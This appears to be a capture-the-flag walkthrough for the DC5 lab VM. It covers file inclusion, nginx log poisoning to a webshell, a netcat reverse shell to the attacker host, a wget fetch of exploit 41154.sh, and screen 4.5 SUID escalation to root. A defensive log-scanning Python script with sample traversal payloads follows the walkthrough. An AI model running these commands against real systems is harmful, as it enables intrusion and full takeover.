DC5 Target Machine Notes
2023-03-09 10:47:00

Information

Nmap

sudo nmap -p- -sS -A -sV -vv 192.168.1.132

Dirsearch

dirsearch -u http://192.168.1.132/

File://

The passwd file is readable through file inclusion

The nginx log is readable

UploadWebShell

Webshell->NginxLog

GetWebShell

Whoami(www-data)

GetShell

Reverse shell

Kali: nc -lvnp 5555
Dc5: nc -c sh 192.168.1.117 5555

TTYShell

python -c 'import pty; pty.spawn("/bin/bash")'

SUID - screen 4.5 privilege escalation

find / -user root -perm /4000 2>/dev/null

Searchsploit

searchsploit screen 4.5

GetPocFile

Kali:
cd /usr/share/exploitdb/exploits/linux/local/
python3 -m http.server 7777

Kali (Dc5 shell):
cd /tmp
wget http://192.168.1.117:7777/41154.sh

Pwn!

Kali (Dc5 shell):
chmod +x 41154.sh
./41154.sh
whoami -> root

Flag!

find / -name "*flag*"

cat /root/thisistheflag.txt

Sum-up

Nmap -> 80 (nginx)
Dirsearch -> thankyou.php file inclusion
Nginxlog -> get webshell
SUID privilege escalation -> screen 4.5 -> root
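
A defender's view of the File:// and UploadWebShell steps, as an added example that is not part of the original notes: a Python check that flags access-log lines carrying a PHP open tag and requests whose parameter values point at local files. The log lines are constructed, the parameter name p is hypothetical, and /var/log/nginx/access.log is assumed as the log path (nginx's default).

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) \S+ "(.*?)" "(.*)"$')
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
# Parameter values that point at local files (assumed pattern list, extend as needed).
LOCAL_FILE = re.compile(r"\.\./|^/etc/|^/proc/|^/var/log/|^(file|php)://", re.I)

def classify(line):
    """Return the set of findings for one access-log line."""
    m = LINE.match(line)
    if not m:
        return {"unparsed"}
    _ip, request, _status, referer, agent = m.groups()
    findings = set()
    # Code written into the log: a client-controlled field carries a PHP open tag.
    if any(PHP_TAG.search(unquote(f)) for f in (request, referer, agent)):
        findings.add("php-tag-in-log")
    # The target may contain spaces, so take everything between method and protocol.
    parts = request.split(" ")
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else request
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if LOCAL_FILE.search(value):
            findings.add("local-file-in-parameter")
    return findings

def scan(lines):
    """Return (line number, sorted findings) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        findings = classify(line.rstrip("\n"))
        if findings:
            hits.append((number, sorted(findings)))
    return hits

# Constructed sample log; the parameter name "p" is hypothetical.
SAMPLE = [
    '192.168.1.50 - - [09/Mar/2023:10:40:01 +0800] "GET /contact.php HTTP/1.1" 200 4025 "-" "Mozilla/5.0"',
    '192.168.1.117 - - [09/Mar/2023:10:56:50 +0800] "GET /thankyou.php?p=/etc/passwd HTTP/1.1" 200 1720 "-" "Mozilla/5.0"',
    '192.168.1.117 - - [09/Mar/2023:10:59:17 +0800] "GET /thankyou.php?p=<?php /*constructed*/ ?> HTTP/1.1" 200 852 "-" "Mozilla/5.0"',
    '192.168.1.117 - - [09/Mar/2023:11:00:55 +0800] "GET /thankyou.php?p=/var/log/nginx/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.168.1.117 - - [09/Mar/2023:11:01:10 +0800] "GET /thankyou.php?p=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1720 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE):
        print(number, ", ".join(findings))
```

A php-tag-in-log hit followed by a request whose parameter points at the log file is the sequence recorded in the Webshell->NginxLog step.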